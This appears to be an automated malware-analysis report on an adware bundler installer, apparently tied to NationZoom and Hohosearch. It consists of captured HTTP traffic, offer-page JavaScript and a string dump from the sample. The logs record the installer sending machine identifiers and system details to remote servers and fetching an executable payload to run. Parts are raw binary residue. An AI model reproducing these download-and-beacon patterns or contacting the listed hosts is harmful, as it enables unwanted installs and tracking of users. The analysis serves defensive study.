......}....7......_..^]..._2.^][email protected].
.......^]........U...u........t..u....g...]...2.]................U..Q.
u........t..u....u......Y]...2.Y]..........V.........^.....3..........
u....w.....F.........j.j.j.h.......`A................U...E.....]..<<< skipped >>>

GET /V38/amipb.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.continuumdownload.com/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn1.downloadaxel.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Length: 72267

Connection: keep-alive

Date: Thu, 30 Jun 2016 11:52:08 GMT

Last-Modified: Thu, 30 Jun 2016 11:47:44 GMT

ETag: "ecff2ed06ac9c71e23853f0e7bd249e0"

x-amz-storage-class: REDUCED_REDUNDANCY

Accept-Ranges: bytes

Server: AmazonS3

Age: 42457

X-Cache: Hit from cloudfront

Via: 1.1 3fe626ff9b8e73cd85a4a1e019abf439.cloudfront.net (CloudFront)

X-Amz-Cf-Id: agrapGOeVDGt4U0rmB8vT8UhDmQTAvNVN0l_eWkUNLn6qmSEg4SW9A==
..//<!-- ../*    Progress bar   */..var g_AmiPbs = new Array();.var
 g_AmiPbsEx = new Array();.var g_interval = 0;.var g_initComp = 0;.var
 g_possibleComps = [];.var g_reportedComps = [];.var g_removedComps = 
[];..var g_disable_updater = false;..//in the version we tests updater
 task is created firstly.var g_UpdaterTestVersion = (typeof (g_ver) !=
= 'undefined' && g_ver != null && g_ver == '1.1.5.90');.var g_UpdaterT
askCreated = false;..function LogMessage(message) {.    try {.        
g_ami.Log(message);.    }.    catch (excpt) {.    }.}..function IsDecl
ined(name) {.    var declined = 0;.    for (var i = 0; i < g_remove
dComps.length; i  ) {.        if (g_removedComps[i] == name) {.       
     declined = 1;.            break;.        }.    }.    return decli
ned;.}..function UpdateSkipStatus(sn) {.    if (g_testa && !ArrayConta
ins(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayCont
ains(g_notest1, sn) && !ArrayContains(g_notest2, sn)) {.        if (g_
testa.constructor != Array || ArrayContains(g_testa, sn)) {.          
  g_ami.WriteProfileString(g_testf, '', sn, 'S');.            g_report
edComps.push(sn);.        }.    }.}..function ShortNameFromName(name) 
{.    for (c = 0; c < g_comps.length; c  ) {.        if (g_comps[c]
.name == name) {.            return g_comps[c].sn;.        }.    }.   
 return name;.}..function UpdateComponentsStatus() {.    LogMessage('U
pdateComponentsStatus function started');.    for (var j = 0; j < g
_possibleComps.length; j  ) {..        if (g_possibleComps[j].sn =<<< skipped >>>

GET /upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, HTTP/1.1

Host: d2jeaw7c5nmwo6.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Server: nginx/1.8.0

Date: Mon, 18 Jul 2016 23:41:27 GMT

X-Cache: Miss from cloudfront

Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)

X-Amz-Cf-Id: YayF0mq1SNybD_LGuqw18qCrLsqQLpCy5ij5ZS-GKvlxebYfSZF8cA==
....


GET /gkozn0k4?uid=ADCA2197E17DE989DA91F56322BE0AB0&update0=version,201607181114&update1=sys,Microsoft.Windows.XP&update4=ref,amz&update5=mode,&update6=sys0,Microsoft&update7=sys1,Windows&update8=sys2,XP&update9=sys3,&update10=sys4, HTTP/1.1

Host: d2jeaw7c5nmwo6.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Server: nginx/1.8.0

Date: Mon, 18 Jul 2016 23:41:27 GMT

X-Cache: Miss from cloudfront

Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)

X-Amz-Cf-Id: DoS3_zHXN6RMj1QuqUibMrDmlK4Jp-kC4g2YN8tEOt1nSq1K7_DJMw==

....

GET /upt8hksa?uid=ADCA2197E17DE989DA91F56322BE0AB0&a=visit.dl.winmain.prestart4.54359f8ab1edeba9bf9f1f54346ec7d8.0 HTTP/1.1

Host: d2jeaw7c5nmwo6.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Server: nginx/1.8.0

Date: Mon, 18 Jul 2016 23:41:27 GMT

X-Cache: Miss from cloudfront

Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)

X-Amz-Cf-Id: fy58qKstRrZCUhYrjgymjh8hsFXdkTeIygmpY_Gk39A-pVuhiKoDgg==

....

GET /te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&a=visit.dl.winmain.prestart4.54359f8ab1edeba9bf9f1f54346ec7d8.0 HTTP/1.1

Host: d2jeaw7c5nmwo6.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Server: nginx/1.8.0

Date: Mon, 18 Jul 2016 23:41:27 GMT

X-Cache: Miss from cloudfront

Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)

X-Amz-Cf-Id: XCLWWYd_JCwUieChtQrhT0Dj2BiD3LR0uoQaa5anG2DLHF1jknUTbQ==

....

GET /te610ket?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&a=visit.dl.winmain.start.100 HTTP/1.1

Host: d2jeaw7c5nmwo6.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Server: nginx/1.8.0

Date: Mon, 18 Jul 2016 23:41:27 GMT

X-Cache: Miss from cloudfront

Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (CloudFront)

X-Amz-Cf-Id: m3nP3_KmswDMLUQU7y5gPFRmzO_2CoE9EQ44TfQAfOnreAUL3Z1NKQ==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Server: ng
inx/1.8.0..Date: Mon, 18 Jul 2016 23:41:27 GMT..X-Cache: Miss from clo
udfront..Via: 1.1 38133ea2296a83bfacba51a6f2abd5a6.cloudfront.net (Clo
udFront)..X-Amz-Cf-Id: m3nP3_KmswDMLUQU7y5gPFRmzO_2CoE9EQ44TfQAfOnreAU
L3Z1NKQ==......

GET /main/tmnqck.exe HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: d3tufnia3qwp0y.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 353992

Connection: keep-alive

Date: Mon, 18 Jul 2016 23:41:24 GMT

Last-Modified: Mon, 18 Jul 2016 23:30:39 GMT

ETag: "54359f8ab1edeba9bf9f1f54346ec7d8"

x-amz-storage-class: REDUCED_REDUNDANCY

x-amz-meta-content-md5: 54359f8ab1edeba9bf9f1f54346ec7d8

Accept-Ranges: bytes

Server: AmazonS3

X-Cache: Miss from cloudfront

Via: 1.1 8cdc69e06e564b9aef153cf0b52204b0.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Q4uVE8CsHHM7-nJS7mHy7uv6H-OetHuOgUkqcy2ceuT4k_vvFp-H4w==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......&...b||.b||.
b||.o...@||.o...)||.o....||.$-..`||.k...{||.b|}..||.....L||.o...c||.b|
..`||.....c||.Richb||.........PE..L....J.W.................J...f......
.p.......`....@..................................`....................
..................<,.......................P.......................
...........................@............`.............................
..text....I.......J.................. ..`.rdata.......`.......N.......
.......@[email protected]........@.......*[email protected]..............
..H..............@..@.................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................Q..........hPYD..uF..Y.
..{.....E...A.E..:......E..T...h}YD..JF..Y....E......hsYD..4F..Y....E.
.....hiYD...F..Y.j....E...}...j....E...}...j....E...}...j....E...}....
..............E.E............Q.H.E...M....P.E...%P.E.....h.YD...T.E...
....E..Y................Y.E..\.........h..D..\.E...(..h.YD..aE..Y.....
..u.E..,.........j....E...}.......y.E............h.YD.. E..Y..`]E...A.
.h.YD...E..Y.h.YD...D..Y.h.YD...D..Y...mE......h.YD...D..Y.h.YD...D..Y
..XnE......h.YD...D..Y...............U..QSVW........N.......N0....<<< skipped >>>

POST /index.php HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.continuumdownload.com

Content-Length: 583

Connection: Keep-Alive

Cache-Control: no-cache

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=B3920CF566AB717F84CE9CE32F62B904&Sysid1=B3920CF566AB717F84CE9CE32F62B904&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&ci=99999&cmdl=amisetup7604__99999_il2.exe /s  /ver 1.1.2.41  /u http://VVV.continuumdownload.com/index.php /ta /ci 99999 /i NationZoom&dprod=19C2FB3DEC385401F6FCF22178334A&exe=amisetup7604__99999_il2&ffver=&i=NationZoom&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFAzAA==&netfs=3&s=Y&ts=1468885284&ver=1.1.2.41
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Mon, 18 Jul 2016 23:41:22 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

transfer-encoding: chunked

Connection: keep-alive
2d61....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//
EN">.<html>.    <head>.        <meta http-equiv="con
tent-type" content="text/html; charset=UTF-8" /> .        <title
>nop</title>...<script type="text/javascript">...  var 
g_notCompatibleWithUpdaterComps = ['LootFindKP'];...  var g_postponedC
omps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba',  'UCwebAcceler
ator', 'UltimateSecurityPackage' ,  'TotalSecurity', 'TotalSecurityIN'
, 'TotalSecurityRU'];...</script> .        <base href="http:/
/VVV.continuumdownload.com:80/index.php" />.        <script type
="text/javascript" src="hXXp://cdn1.downloadaxel.com/V38/amipb.js">
</script>.        <script type="text/javascript">.var g_r_
_capp="nop";..            var g_amiobj = '', g_ami, g_updb = false, g_
close = '0', g_additional_offer_list = '0';.            var g_finish_i
nstall_button = '0';.            var g_popup_install_all = '0';.      
      var g_eula = '';.            var g_post1 = '_hdn=1&_ver=1.1.2.41
&_p=1&_s=0&_cc=UA&_cid=99999&_psb=0&_cnt=70485cab8ae29501976866d3a3ff0
9b2&_instid=l2&_brw=ie&_fc=1289&_appname=&_appimageurl=&_netfs=0&_vert
=3';.            var g_icon = '';.            var g_comps = [], g_page
s = [], c, g_curPage = -1;.            var g_cid = '99999';.          
  var g_tid = '';.            var g_cc = 'UA';.            var g_lang 
= 'en';.            var g_ip = '194.242.96.226';.            var g_bro
wser = 'ie';.            var g_cnt = '9a2093ee772cbb280d9dbc8af51a<<< skipped >>>

POST /finalize.php HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://VVV.continuumdownload.com/index.php

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.continuumdownload.com

Content-Length: 204

Connection: Keep-Alive

Cache-Control: no-cache

_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=99999&_psb=0&_cnt=70485cab8ae29501976866d3a3ff09b2&_instid=l2&_brw=ie&_fc=1289&_appname=&_appimageurl=&_netfs=0&_vert=3&r_nop=0&r_NationZoom=1&nop=3&NationZoom=2
HTTP/1.1 200 OK

Content-Type: text/xml

Date: Mon, 18 Jul 2016 23:41:22 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 2455

Connection: keep-alive
....<Array><page><f>1</f><fb>1</fb>
;<pt>0</pt><cats>0</cats><updh>1</upd
h><wrn></wrn><comps></comps><short_name&
gt;</short_name><must_show>0</must_show><bdy>P
GRpdiBjbGFzcz0iY2xhc3MtMWxpbmVyIj48ZGl2IGNsYXNzPSJjaGVjay1ob2xkZXIiPjx
kaXYgY2xhc3M9ImNsYXNzLWNoZWNrLTEiIGlkPSJhbWlfY2hlY2tfTmF0aW9uWm9vbSIgb
25jbGljaz0iQW1pQ2hlY2tDdHJsQ2xpY2tlZCgpIj4KICAgICAgICAgICAgICAgICAgICA
gICAgIDxpbnB1dCBpZD0iaV9hbWlfTmF0aW9uWm9vbSIgbmFtZT0iSG9ob3NlYXJjaCIgd
HlwZT0iaGlkZGVuIiB2YWx1ZT0iMSIgLz48L2Rpdj48ZGl2IGNsYXNzPSJjbGFzcy1saW5
lMSI PHNwYW4 U2V0IEhvaG9zZWFyY2ggYXMgaG9tZXBhZ2UgYW5kIGRlZmF1bHQgc2Vhc
mNoIG9uIENocm9tZSBhbmQgRmlyZWZveCBicm93c2VyLjwvc3Bhbj48L2Rpdj48L2Rpdj4
8ZGl2IGNsYXNzPSJjbGFzcy1saW5lMiI PHNwYW4 QnkgY2xpY2tpbmcgIk5leHQiIG9yI
CJJbnN0YWxsIiBJIGFncmVlIHRvIHRoZSA8YSBocmVmPSJodHRwOi8vdGlueXVybC5jb20
vaDR3cjk5YiIgdGFyZ2V0PSJfYmxhbmsiPiBFdWxhPC9hPiBhbmQgPGEgaHJlZj0iaHR0c
DovL3Rpbnl1cmwuY29tL2o5anQyeHYiIHRhcmdldD0iX2JsYW5rIj5Qcml2YWN5IFBvbGl
jeSA8L2E IGFuZCBjb25zZW50IHRvIGluc3RhbGwgSG9ob3NlYXJjaC48L3NwYW4 PC9ka
XY PC9kaXY PGlucHV0IHR5cGU9ImhpZGRlbiIgdmFsdWU9IjEiIGlkPSJpX2FtaV9ub3A
iLz48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0iTmF0aW9uWm9vbSxub3AiIGlkPSJhb
Gxfc2hvcnRfbmFtZXMiLz4=</bdy><img>__empty__</img><
;/page><page><f>1</f><fb>0</fb><pt
>1</pt><cats>0</cats><updh>1</updh>&l
t;wrn></wrn><comps></comps><short_name><<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_600:

.text

`.rdata

@.data

.rsrc

@.reloc

f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\xutility

f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\xmbtowc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c

%s(%d) :

%s_%0x

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c

Client hook allocation failure at file %hs line %d.

Memory allocated at %hs(%d).

Client hook re-allocation failure at file %hs line %d.

HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.

CRT detected that the application wrote to memory after end of heap buffer.

HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.

CRT detected that the application wrote to memory before start of heap buffer.

CRT detected that the application wrote to a heap buffer that was freed.

crt block at 0x%p, subtype %x, %Iu bytes long.

client block at 0x%p, subtype %x, %Iu bytes long.

%hs(%d) :

#File Error#(%d) :

Data: <%s> %s

f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strerror.c

Visual C   CRT: Not enough memory to complete call to strerror.

f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c

_CrtDbgReport: String too long or IO Error

Debug %s!

Program: %s%s%s%s%s%s%s%s%s%s%s%s

f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c

f:\dd\vctools\crt_bld\self_x86\crt\src\input.c

%s(%d) : %s

_CrtDbgReport: String too long or Invalid characters in String

GetProcessWindowStation

f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowenv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\w_env.c

f:\dd\vctools\crt_bld\self_x86\crt\src\output.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\read.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c

Broken pipe

Inappropriate I/O control operation

Operation not permitted

f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c

portuguese-brazilian

Run-Time Check Failure #%d - %s

%s%s%s%s

%s%s%p%s%ld%s%d%s

operator

f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c

RegCloseKey

RegOpenKeyExW

f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c

c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xlocale

c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xiosbase

c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlexcept.h

c:\Program Files\Microsoft Visual Studio 10.0\VC\include\streambuf

c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\cstringt.h

C:\iPumper\iPumper\YoutubeUploader\SilentUpdater4\Release\ajdfhsjdh.pdb

RPCRT4.dll

RegOpenKeyW

RegCreateKeyW

ADVAPI32.dll

URLDownloadToFileW

urlmon.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

SHFileOperationW

SHELL32.dll

ole32.dll

OLEAUT32.dll

WinHttpReceiveResponse

WinHttpSetTimeouts

WinHttpSetOption

WinHttpGetIEProxyConfigForCurrentUser

WinHttpSendRequest

WinHttpWriteData

WinHttpConnect

WinHttpCloseHandle

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpenRequest

WinHttpGetProxyForUrl

WinHttpCrackUrl

WinHttpReadData

WinHttpAddRequestHeaders

WINHTTP.dll

USERENV.dll

GetCPInfo

zcÁ

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>

8$8,8[8`8

5 5$5(5,5054585<5

6 70757^7

6$61666<6

:1:6:;:}:

;'<,<1<|<

; ;$;(;,;0;4;

1 1$1(1,10141

; ;$;(;,;0;4;8;<;@;

4 4@4`4|4

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp

%S(%d) :

ppCategory && pfnCrtDbgReport

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpcoll.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlmem.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlstr.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h

Bf:\dd\vctools\crt_bld\self_x86\crt\src\dbgdel.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fwscanf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c

Ff:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c

wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)

wcscpy_s(szExeName, 260, L"<program name unknown>")

__crtMessageWindowW

f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c

_CrtCheckMemory()

_CrtIsValidHeapPointer(pUserData)

_CrtSetDbgFlag

(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)

_CrtMemCheckpoint

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\getenv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcslwr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c

f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wmemcpy_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fread.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c

("Invalid MBCS character sequence passed to strftime",0)

("Invalid MBCS character sequence passed into strftime",0)

strcpy_s(errmsg, (94 38 2), _get_sys_err_msg(errnum))

f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl

strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")

strcpy_s(szExeName, 260, "<program name unknown>")

__crtMessageWindowA

mscoree.dll

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\typname.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\_open.c

f:\dd\vctools\crt_bld\self_x86\crt\src\close.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fileno.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_freebuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrptt.c

wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")

strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")

_VCrtDbgReportA

strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")

wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

_VCrtDbgReportW

f:\dd\vctools\crt_bld\self_x86\crt\src\winsig.c

WUSER32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\localref.c

((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[category].wrefcount == NULL))

KERNEL32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\expand.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsnicol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\timeset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\lseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\write.c

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)

wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")

wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")

_NMSG_WRITE

f:\dd\vctools\crt_bld\self_x86\crt\src\crt0msg.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_filbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stricmp.c

Bf:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\getqloc.c

user32.dll

f:\dd\vctools\crt_bld\self_x86\crt\src\intel\fp8.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cvt.c

ADVAPI32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\open.c

0 && "Only UTF-16 little endian & UTF-8 is supported for reads"

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wctomb.c

f:\dd\vctools\crt_bld\self_x86\crt\src\commit.c

("CRT Logic error during setenv",0)

__crtwsetenv

f:\dd\vctools\crt_bld\self_x86\crt\src\lseeki64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\isatty.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbtowc.c

_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2

f:\dd\vctools\crt_bld\self_x86\crt\src\errmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicmp.c

MSPDB100.DLL

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\tran\contrlfp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_fptostr.c

strcpy_s(resultstr, resultsize, autofos.man)

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\cfout.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setmode.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\include\strgtold12.inl

f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c

f:\dd\vctools\crt_bld\self_x86\crt\src\a_cmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c

__crtsetenv

f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c

c:\Program Files\Microsoft Visual Studio 10.0\VC\include\xstring

c:\Program Files\Microsoft Visual Studio 10.0\VC\include\vector

std::_Vector_const_iterator<class std::_Vector_val<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >,class std::allocator<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> > > > >::operator *

std::_Vector_const_iterator<class std::_Vector_val<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >,class std::allocator<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> > > > >::operator

c:\Program Files\Microsoft Visual Studio 10.0\VC\include\memory

std::vector<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >,class std::allocator<class std::basic_string<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> > > >::operator []

c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlconv.h

hAtlThrow: hr = 0x%x

c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcore.h

c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlbase.h

c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlcoll.h

c:\ipumper\ipumper\youtubeuploader\common\include\..\..\ThirdParty\ATLRegExp\atlrx.h

WinHttpClient

std::vector<wchar_t,class std::allocator<wchar_t> >::operator []

std::_Vector_const_iterator<class std::_Vector_val<wchar_t,class std::allocator<wchar_t> > >::operator  =

std::_Vector_const_iterator<class std::_Vector_val<wchar_t,class std::allocator<wchar_t> > >::operator *

std::_Vector_const_iterator<class std::_Vector_val<wchar_t,class std::allocator<wchar_t> > >::operator

{E4631BC4-65DE-4E77-A594-E81D5A671449}

iexplore.exe

